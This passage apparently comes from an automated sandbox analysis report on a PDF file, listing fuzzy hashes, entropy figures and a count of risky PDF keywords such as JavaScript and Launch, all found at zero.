                    SSDEEP:3072:zY42NABZQ1NwSw3S7rgsztY42NABZQ1NwSw3S7rgszL:U42h1Nvw3SAD42h1Nvw3SAO
                    TLSH:1CB3E0B8D2F1AC40CEC9C9719A9473907BECF9D3559584E01BE66F4BB9CA4B883005CE
                    File Content Preview:%PDF-1.4.%.....1 0 obj.<</Title (about:blank)./Creator (Mozilla/5.0 \(X11; Linux x86_64\) AppleWebKit/537.36 \(KHTML, like Gecko\) HeadlessChrome/131.0.0.0 Safari/537.36)./Producer (Skia/PDF m131)./CreationDate (D:20250310193950+00'00')./ModDate (D:202503

                    File Icon

                    Icon Hash:62cc8caeb29e8ae0

                    Static PDF Info

                    General

                    Header:%PDF-1.4
                    Total Entropy:7.923700
                    Total Bytes:115999
                    Stream Entropy:7.924770
                    Stream Bytes:113445
                    Entropy outside Streams:5.182881
                    Bytes outside Streams:2554
                    Number of EOF found:1
                    Bytes after EOF:
                    NameCount
                    obj18
                    endobj18
                    stream5
                    endstream5
                    xref1
                    trailer1
                    startxref1
                    /Page2
                    /Encrypt0
                    /ObjStm0
                    /URI0
                    /JS0
                    /JavaScript0
                    /AA0
                    /OpenAction0
                    /AcroForm0
                    /JBIG2Decode0
                    /RichMedia0
                    /Launch0
                    /EmbeddedFile0
                    IDDHASHMD5Preview
                    400000000000000002aca3e3a0628eaab8f6b1f73fdcca5d9
                    800000000000000002aca3e3a0628eaab8f6b1f73fdcca5d9